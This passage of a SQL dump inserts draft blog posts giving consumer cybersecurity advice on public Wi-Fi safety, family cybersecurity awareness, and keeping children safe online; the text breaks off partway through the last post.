Avoid accessing things like online banking, entering your credit card details, or logging into personal accounts whenever possible. If it\'s something that could put your identity or finances at risk, save it for a secure, private network instead.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use a Virtual Private Network (VPN)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to stay safe on public Wi-Fi is by using a VPN. A VPN encrypts your internet connection, creating a secure tunnel between your device and the internet. This makes it much harder for attackers to intercept or steal your information. Many VPN providers also route your data through servers in different locations, adding another layer of security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Stick to Trusted Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all public Wi-Fi networks are created equal. It\'s best to use networks from reputable providers, such as those in hotels, coffee shops, or major retail chains. Always avoid unknown networks, as attackers often set up fake Wi-Fi hotspots (sometimes called \"honeypots\") to lure unsuspecting users.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Double-Check Network Names</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before connecting to a network, verify its name with the business or service provider. Cybercriminals often create malicious networks with names that closely resemble legitimate ones. For example, a café\'s network might be \"CoffeeShop_WiFi,\" while the fake network, set up by a hacker, might be \"Coffee_Shop_FreeWiFi.\"</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Turn Off Sharing Options</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To prevent unauthorized access to your files or device, disable file sharing and other network-sharing options on your computer or smartphone. Most devices allow you to toggle sharing settings on or off when you\'re connecting to a new network. Keeping these options turned off will create an extra barrier against attackers attempting to access your personal files.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Update Your Software Regularly</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals often exploit known security vulnerabilities in outdated software. To stay ahead of them, keep your operating system, apps, and antivirus software up to date with the latest patches. Updates often contain fixes for security vulnerabilities, so they’re an essential layer of defense when you\'re on public Wi-Fi, or any network for that matter.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Additional Safety Strategies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you frequently use public Wi-Fi, consider implementing these additional safety measures for greater protection.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enable Two-Factor Authentication (2FA):</strong></b> Even if your password is compromised, 2FA provides an extra layer of security by requiring a second verification step. This could be a code sent to your phone or generated by an app.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use HTTPS Websites:</strong></b> When entering sensitive information, make sure the website\'s URL begins with \"https://\". The \"S\" stands for secure, meaning the website uses encryption to protect your data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Log Out When Finished:</strong></b> If you\'ve logged into any accounts while on public Wi-Fi, be sure to properly log out and close your browser before disconnecting from the network.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bottom Line</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks can be a lifesaver when you\'re on the go, but they come with significant risks. Poor encryption, shared resources, and lack of proper maintenance make these networks an attractive target for attackers. However, by following the safety precautions outlined above, you can significantly reduce your vulnerability to cyber threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize your security, make a habit of using a VPN, avoiding sensitive activities, and keeping your software up-to-date. While public Wi-Fi will never be as secure as your private, encrypted network at home, a few smart steps are all it takes to protect your data while staying connected.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By being aware and vigilant, you can enjoy the convenience of public Wi-Fi without compromising your digital safety.</p>', '', NULL, NULL, 1, 'draft', '2024-01-02 03:25:21', '2026-01-12 21:41:44', 'Information Security', 'How to Stay Secure while using Public WiFi', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(141, 'Cybersecurity awareness for parents', 'cybersecurity-awareness-for-parents', 'Cybersecurity is the practice of protecting devices, networks, and sensitive information from cyber attacks, unauthorized access, and other forms of digital harm. As technology continues to advance and play a larger role in our lives, it\'s important to take steps to protect ourselves and our personal information online.\r\n\r\nI believe this is the best sample of how important cybersecurity is for kids.\r\n\r\n\r\n\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn\'t just for IT professionals or big corporations—it\'s essential for everyone, including families. Protecting personal information and keeping your loved ones safe online starts at home. Cyber threats are constantly evolving, and understanding their importance is the first step toward prevention.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s why cybersecurity matters for families and how you can get started with simple, practical steps.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Value of Personal Information</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals are always on the lookout for personal information that they can exploit for their gain. Data such as financial records, documents, and personal photos are all highly valuable. They can use this information for identity theft, financial fraud, or other malicious activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think about the lists of passwords saved online, family vacation photos stored on your devices, or sensitive financial documents saved on a cloud platform. Without adequate protection, this data can easily fall into the wrong hands.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Personal Info</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong Passwords</strong></b>: Create unique passwords for every account and consider using a password manager to keep track of them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Keep Software Updated</strong></b>: Always update your devices to the latest versions to protect against vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Be Careful About Sharing</strong></b>: Teach your family to think before sharing personal details online, especially on social media.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Real Consequences of Cyber Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks are more common and damaging than most people realize. From phishing scams and malware to ransomware, there’s no shortage of tactics cybercriminals can use to access your personal information. The consequences can range from identity theft and financial loss to, in rare cases, physical harm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Theft</strong></b>: Hackers can impersonate you, open bank accounts in your name, or misuse your existing financial accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Financial Loss</strong></b>: Cybercriminals can drain savings accounts or make unauthorized purchases.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputation Damage</strong></b>: Personal photos and information posted online without consent can impact your or your children’s reputation.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Education is key. Parents need to be aware of these risks and teach their children to recognize warning signs, such as phishing emails or malicious links.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Children Are Particularly Vulnerable</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children are often the easiest targets for cybercriminals because they may not understand online risks. Without guidance, they can fall prey to scams or overshare personal information.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance, a child could unknowingly download malware by clicking on an ad for a free game or responding to a message from a stranger in an online forum. The consequences can be devastating, exposing not just their devices but the entire family’s network to potential threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Teach Children Online Safety</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Monitor Online Activity</strong></b>: Supervise your child’s internet habits, especially when they’re young.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Set Boundaries</strong></b>: Limit screen time and restrict access to certain sites or applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Provide Guidance</strong></b>: Teach kids about safe browsing habits, such as avoiding suspicious links and not sharing personal information.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity in Education and Professional Life</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The importance of cybersecurity extends far beyond personal life. Schools and workplaces increasingly rely on technology, and cyber threats exist in these environments, too. Whether your child is submitting homework via an online portal or looking to join the workforce in a tech-powered industry, understanding cybersecurity is essential.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By equipping children with knowledge now, you’re not just protecting their current activities, but also preparing them for challenges they’ll face throughout their careers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Tips:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Educate children on secure file-sharing practices and how to recognize phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Encourage the use of secure platforms approved by schools and workplaces.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Teach them why cybersecurity policies exist and how to follow them.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Starts with the Family</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just an individual responsibility—it’s a family affair. By making it a shared priority, everyone can contribute to a safer online environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lead by Example:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Good Habits</strong></b>: Use strong passwords, update your devices regularly, and avoid questionable links.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Have Regular Discussions</strong></b>: Talk openly about cybersecurity with your family, making it a part of normal conversations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Create a Plan</strong></b>: Develop a family plan for handling potential security breaches, like what to do if an account gets hacked.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When every member of the family is informed and engaged, it becomes much easier to protect everyone.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Updated, Stay Safe</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The world of cybersecurity changes quickly. New threats emerge daily, and it’s crucial to stay ahead. Regular updates, learning about the latest threats, and using reliable security software can go a long way in protecting your family.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Stay Updated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Follow Reputable News Sources</strong></b>: Subscribe to cybersecurity blogs or newsletters.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Update Regularly</strong></b>: Keep all software, devices, and applications up to date to avoid vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Review Policies Periodically</strong></b>: Check security settings on your devices and services often to ensure they meet the latest safety standards.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">An Investment that Pays Off</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider this—a little time and money invested in cybersecurity today can save you from the significant financial and emotional costs of a security breach tomorrow. The cleanup process after an incident is often more time-consuming and expensive than taking steps to prevent it in the first place.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some simple proactive measures include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing antivirus software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Using two-factor authentication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Backup important files regularly to prevent data loss.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The peace of mind that comes from knowing your family’s online presence is secure is priceless.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity in today’s digital landscape is non-negotiable. Parents play an essential role in equipping their families with the skills and tools to stay safe online. Whether it’s protecting personal information, educating children about online risks, or staying updated on emerging threats, the responsibility starts at home.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By fostering awareness and good habits, you can safeguard your family from the growing dangers of cyber threats—and ensure that technology enhances, rather than compromises, your loved ones\' lives.</p>', '', NULL, NULL, 1, 'draft', '2023-12-02 03:23:04', '2026-01-12 21:41:44', 'CyberKids', 'Cybersecurity awareness for parents', '', NULL),
(142, '5 Tips for Keeping Your Kids Safe Online', '5-tips-for-keeping-your-kids-safe-online', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet has become an integral part of our lives, offering kids access to incredible opportunities, knowledge, and social connections. However, this digital era also presents a range of risks for children, including cyberbullying, online predators, and exposure to inappropriate content.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It is more important than ever for parents to take a proactive role in teaching kids about online safety and creating a secure digital environment for them. Curious about where to start? Here are five actionable tips to protect your kids in the online world while empowering them to use technology responsibly.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Set Clear Rules and Boundaries</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to keep your kids safe online is by establishing clear rules and boundaries regarding their online activities. This means setting specific guidelines for internet usage and consistently communicating these expectations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are some examples of rules parents might enforce:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Setting time limits on devices or internet usage each day.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Defining which websites, apps, and social media platforms are allowable.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Outlining what personal information should never be shared online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Establishing consequences for breaking online safety rules.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When kids know what’s expected of them, it creates an atmosphere of structure and accountability. These boundaries also help minimize risky behaviors, such as falling for online scams or interacting with harmful content.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But this is not just a one-time step. Over time, as your children grow and explore new digital experiences, it’s important to revisit and adjust these rules together. Building an ongoing conversation ensures they understand the importance of safe habits while respecting the digital boundaries you’ve put in place.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use Parental Controls</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parental controls can act as your first line of defense in protecting kids online. These tools—built into most devices and internet service providers—allow parents to monitor and restrict their children’s online activity.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Do Parental Controls Help?</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Blocking Harmful Content</strong></b> – Certain websites or media platforms can expose children to inappropriate material. Parental controls ensure access is denied to such content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Setting Time Limits</strong></b> – Control features allow you to limit screen time, ensuring kids don’t spend hours glued to their screens.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitoring Activity</strong></b> – Keep tabs on your child’s viewing habits or browsing history to better understand their interests and address potential risks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some popular solutions include browser plugins, dedicated parental control software, and inbuilt device settings offered by platforms like Android or iOS. Tools like Google\'s Family Link or software such as Net Nanny are great starting points.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be transparent with your kids about why you are using parental controls and explain how these tools aim to protect them. When they see this as a collaborative step toward their safety, they’re more likely to accept these measures positively.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Teach Them About Online Safety</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Nothing beats empowering your kids with the skills to protect themselves online. By teaching them about online safety early on, you help them recognize potential risks and make informed decisions while browsing the internet.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Topics to Cover in Online Safety Education:</h4>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cyberbullying</strong></b> – Help kids identify the signs, understand its impact, and teach them how to respond if they or their friends are targeted.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Privacy Awareness</strong></b> – Explain the importance of keeping private information—such as their address, school name, or passwords—off the internet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Recognizing Scams</strong></b> – Teach them how to identify phishing emails, suspicious pop-ups, or fake social media profiles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Content Boundaries</strong></b> – Discuss the risks of consuming inappropriate videos, articles, or games.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tailor these discussions to your child’s age and level of understanding. For example, younger kids may need simpler language and direct examples, like not talking to strangers online, while teenagers might benefit from deeper conversations about privacy settings or managing their digital footprint.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Lead by example—your children will learn a great deal from observing the way you behave online. Model safe habits like double-checking privacy settings and avoiding oversharing personal details on public platforms.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Monitor 